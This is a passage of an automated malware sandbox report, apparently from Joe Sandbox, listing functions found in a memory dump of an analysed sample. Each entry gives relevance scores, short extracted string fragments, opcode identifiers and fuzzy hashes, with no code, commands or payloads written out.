                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5$EYPb$F\Z[$PW~\$[QGZ$fTST$w@\Y$xZO\
                                                                          • API String ID: 0-864209517
                                                                          • Opcode ID: 09aed6167ef837989ecb60babf3a772e0842d23e462dcf8ff485f5e6fd8bcad5
                                                                          • Instruction ID: e6416b283a8b1698df884f326501841358248382c41529606af9c484cabb5300
                                                                          • Opcode Fuzzy Hash: 09aed6167ef837989ecb60babf3a772e0842d23e462dcf8ff485f5e6fd8bcad5
                                                                          • Instruction Fuzzy Hash: E531DBB0C01259DADB14CFE2E985ADEBFB0FB04709F648588C4697F204DB324A46CF55
                                                                          Function 029FE77C Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$S$\$a$c$e$l
                                                                          • API String ID: 0-3322591375
                                                                          • Opcode ID: c7b7c1317143c722f28bd1b5ece5a15470b16e685a83be9dca9f62dad0e64439
                                                                          • Instruction ID: 804427f7bb32741cef57a165887a958925173658e5081e31754d47d1934073a2
                                                                          • Opcode Fuzzy Hash: c7b7c1317143c722f28bd1b5ece5a15470b16e685a83be9dca9f62dad0e64439
                                                                          • Instruction Fuzzy Hash: 414171B2C50218AACF50EFA4DD84FEEB7FDAF48714F05416AE90DA7240EB715A448F90
                                                                          Function 029E2A6C Relevance: 8.8, Strings: 7, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $8$J$M$b$p$|
                                                                          • API String ID: 0-3427531274
                                                                          • Opcode ID: 22ba3d164730568e44d3f55ecb69a11a446a03645c5e65a650941772ddd22cef
                                                                          • Instruction ID: b6f0e9a64cb2cfadd8de194d53c547c9c57de8d385fec876c9e1642a2f402eac
                                                                          • Opcode Fuzzy Hash: 22ba3d164730568e44d3f55ecb69a11a446a03645c5e65a650941772ddd22cef
                                                                          • Instruction Fuzzy Hash: 2B11BF10D087CADDDB12C7BC84186AEBF715F23224F4886D9D4E12B2D6C2794706D7B6
                                                                          Function 029E2A53 Relevance: 7.6, Strings: 6, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $8$J$M$p$|
                                                                          • API String ID: 0-1286074000
                                                                          • Opcode ID: 30a58ea806ca32bc2fcfd092f4616c54874698cc1b9994a7c22c73a5fff50a5c
                                                                          • Instruction ID: ac54e17268cc015190a73640c884e3cce5ae1e66ba704e92d729d6682899308e
                                                                          • Opcode Fuzzy Hash: 30a58ea806ca32bc2fcfd092f4616c54874698cc1b9994a7c22c73a5fff50a5c
                                                                          • Instruction Fuzzy Hash: 88318020D082C9DEDF22CBA8C4547ADBF755F13214F18C6C9D8A66B2C3C2398B55D7A1
                                                                          Function 029F5FE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$h$o$u
                                                                          • API String ID: 0-1623184870
                                                                          • Opcode ID: 6b07a2f89884cc865d8cfe041feea39746a151ae456c6c1ff6cc00c7ac549453
                                                                          • Instruction ID: d03b2b30030188178bba793299d763006f33795764c58267490c9f9129f11b06
                                                                          • Opcode Fuzzy Hash: 6b07a2f89884cc865d8cfe041feea39746a151ae456c6c1ff6cc00c7ac549453
                                                                          • Instruction Fuzzy Hash: 3081A4B2D502196BDB25EB90DD85FEF737DEF48704F00419AE609B6080EB755B488FA1
                                                                          Function 029F5A1C Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $i$l$o$u
                                                                          • API String ID: 0-2051669658
                                                                          • Opcode ID: 742a70ae0b7d3ccd727bd6544a14724562a7ccf9e3ef04a93fa7288b2980d157
                                                                          • Instruction ID: b1c18b730b542157d0c45f61343e5f128f2542e6847ef7a0848924fefdaf7d00
                                                                          • Opcode Fuzzy Hash: 742a70ae0b7d3ccd727bd6544a14724562a7ccf9e3ef04a93fa7288b2980d157
                                                                          • Instruction Fuzzy Hash: 416160B1900308AFDB64DBA4DC80FEFB7FDAB88714F50455CE65AA7240E735AA45CB60
                                                                          Function 029F5FEC Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$h$o$u
                                                                          • API String ID: 0-1623184870
                                                                          • Opcode ID: 8c6c8630a2c1415f37b39036a3f12b9123562ce6fab267b6046d834f33ff9baa
                                                                          • Instruction ID: ec48fb7102e46444408d99e8f4714ce69790c2a18aee1958b1a4281c60c05133
                                                                          • Opcode Fuzzy Hash: 8c6c8630a2c1415f37b39036a3f12b9123562ce6fab267b6046d834f33ff9baa
                                                                          • Instruction Fuzzy Hash: 854191B1D40219AADB20EBA0DD41FEEB77DEF48704F0042DAE50DB6180EB755B588FA5
                                                                          Function 029DEE05 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :0=($:0=($;&5,$\$p|89
                                                                          • API String ID: 0-500816267
                                                                          • Opcode ID: 0005e930baea9bdd54019f81bbf519916d9480dbd0c8994b8117feff1e36c4e1
                                                                          • Instruction ID: dd81d2dba462b27809cd9360fefc5e288a836fef543c1363f1d1808de62da821
                                                                          • Opcode Fuzzy Hash: 0005e930baea9bdd54019f81bbf519916d9480dbd0c8994b8117feff1e36c4e1
                                                                          • Instruction Fuzzy Hash: CB4110B5C11358CADB20EFA5DA8859DBF31FB61300F208598D9A86F349DB314A86CF91
                                                                          Function 029F56AA Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 4a3c130d4e9d3912b85e0d22358fac9f1f17054e883f4802ca6d012c57f3b80c
                                                                          • Instruction ID: 4a01c2cfce0ab6f7abefe0125509597d6aa953108e9a70d69cf93e62b7658fe6
                                                                          • Opcode Fuzzy Hash: 4a3c130d4e9d3912b85e0d22358fac9f1f17054e883f4802ca6d012c57f3b80c
                                                                          • Instruction Fuzzy Hash: DDB11AB5A00309AFDB64DBA4CC84FEFB7BDAF88704F108558F619A7244DB74AA41CB50
                                                                          Function 029F56AC Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: dc93d9a8ae5fc9cccd84907c317f3dd83b5ced6f5b0802870d193a8223bc970d
                                                                          • Instruction ID: c7bf4fc9156ac6e5220493abc58db8367274f4bcefd1839cfed2ec6be8b8ea79
                                                                          • Opcode Fuzzy Hash: dc93d9a8ae5fc9cccd84907c317f3dd83b5ced6f5b0802870d193a8223bc970d
                                                                          • Instruction Fuzzy Hash: FB611EB5A00309AFDB64DFA4CC84FEFB7BDAF88704F108558E61997244DB71AA45CB60
                                                                          Function 029F556C Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                          • API String ID: 0-2877786613
                                                                          • Opcode ID: 3898c9cb8bc8948e388a64d2a19bc1ffae61c07afdbe6ae313e309ed7b6463fb
                                                                          • Instruction ID: f5f19d12a1a1a2956218f07955eb60d0a86777430078d3ac080284aaef5ea651
                                                                          • Opcode Fuzzy Hash: 3898c9cb8bc8948e388a64d2a19bc1ffae61c07afdbe6ae313e309ed7b6463fb
                                                                          • Instruction Fuzzy Hash: ED4171719512187EEB01EB94DC81FFF7B3DAF49F04F104048FA006A1C0DB75AA158BAA
                                                                          Function 029F184C Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4$B$H$y
                                                                          • API String ID: 0-4138130969
                                                                          • Opcode ID: 9cd2ebcdbea0658b2941d9e5f9a65fafc6e679836fa4b29a59df3dc0098b6646
                                                                          • Instruction ID: 88e2eb4e7173e20913ae81e4318baa8b155235dbfe1fffcdeabcf1cfb6b63187
                                                                          • Opcode Fuzzy Hash: 9cd2ebcdbea0658b2941d9e5f9a65fafc6e679836fa4b29a59df3dc0098b6646
                                                                          • Instruction Fuzzy Hash: BF3125B1D50209BBDB04DB94DD41BFE77B9EF44704F004159EA08A7280EB75AF548BE5
                                                                          Function 029F2C58 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: a0f25e642438d0bcc765a8b9ee6971c36a776a697a0e6308f085131398aac959
                                                                          • Instruction ID: d222af1bdb992864300890f7aefd6366fb372b0239b3ef37d3e9faf94dba6d06
                                                                          • Opcode Fuzzy Hash: a0f25e642438d0bcc765a8b9ee6971c36a776a697a0e6308f085131398aac959
                                                                          • Instruction Fuzzy Hash: 6111CCB1900218ABDB14DF95D8C4ADEF7BAFF04714F048259E9195B245E772D544CBA0
                                                                          Function 029F2C5C Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_2670000_vWFGbvOdxI.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $e$k$o
                                                                          • API String ID: 0-3624523832
                                                                          • Opcode ID: 43ad0daa2615cb0b22bfafbf1d20bc0a44ad2d6a00d8739157a568ff46fb78fe
                                                                          • Instruction ID: aa930e3fe8b7bbe42962881dde12cfea0589b53b25016adacd73ee84f710a827
                                                                          • Opcode Fuzzy Hash: 43ad0daa2615cb0b22bfafbf1d20bc0a44ad2d6a00d8739157a568ff46fb78fe
                                                                          • Instruction Fuzzy Hash: 7001C8B2900208ABDB14DF95D8C4ADEF7BAFF04714F048259E9195B241E7719944CBA0